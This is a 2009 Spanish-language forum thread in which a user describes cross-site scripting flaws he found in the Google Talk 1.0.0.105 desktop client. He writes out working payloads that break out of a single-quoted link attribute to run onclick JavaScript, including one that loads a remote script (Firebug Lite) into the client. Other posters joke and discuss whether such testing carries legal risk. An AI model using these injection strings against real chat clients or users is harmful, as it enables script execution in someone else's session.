XSS en Google Talk 1.0.0.105

Iniciado por WHK, 18 Octubre 2009, 01:54 AM

0 Miembros y 1 Visitante están viendo este tema.

WHK

Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.

Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>

xDD y el resultado es algo asi como esto:



Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write



A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citarhttp://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x=';
hacerle click y luego
Citarhttp://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug  :P

Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .

kamsky

os aburris mucho,verdad¿¿   ;-) ;-) :P
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Jubjub

Jugando con Fósforoshacking con un tono diferente


.
porno

Debci

que gente... se nota el tiempo libre jaja xDD
Y google no podria hacer nada al respecto? no pueden denunciaros o algo por el estilo??

Saludos

:ohk<any>

Y es que a veces pienso que si no estuviera loco no podría salir adelante.
Lo que no se es capaz de dar, en realidad no se posee, uno es poseído por ello.

jdc

Nah.... Google regala poleras xD

Debci

Cita de: janito24 en 21 Octubre 2009, 17:53 PM
Nah.... Google regala poleras xD
enserio, si haceis este tipo de cosas peuden tomar algun tipo de carga legal contra el atacante/tester?

Saludos

jdc

Conociendo a los descubridores... Google ya debe estar enterado y preparando una actualización xD

WHK

google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98

Debci

Cita de: WHK en 21 Octubre 2009, 20:49 PM
google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
jaja ok xD

Saludos